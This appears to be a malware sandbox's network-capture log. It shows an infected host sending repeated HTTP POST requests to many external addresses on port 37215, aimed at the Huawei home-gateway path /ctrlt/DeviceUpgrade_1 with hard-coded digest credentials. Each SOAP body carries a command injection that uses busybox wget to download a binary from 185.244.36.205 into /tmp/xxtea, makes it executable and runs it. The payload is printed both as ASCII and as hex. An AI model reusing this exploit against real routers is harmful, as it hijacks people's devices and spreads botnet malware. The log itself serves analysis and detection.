                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              376192.168.2.155739641.40.116.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718266964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              377192.168.2.1547432122.144.190.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718296051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              378192.168.2.1547612197.116.36.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718297005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              379192.168.2.1555942157.85.54.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718334913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              380192.168.2.154340237.185.90.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718338013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              381192.168.2.153784637.137.190.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718348026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              382192.168.2.1559102190.226.230.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718357086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              383192.168.2.1557266186.146.109.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718374014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              384192.168.2.156006845.59.28.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718406916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              385192.168.2.1552376222.177.142.7237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718434095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              386192.168.2.155616431.86.102.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.718434095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
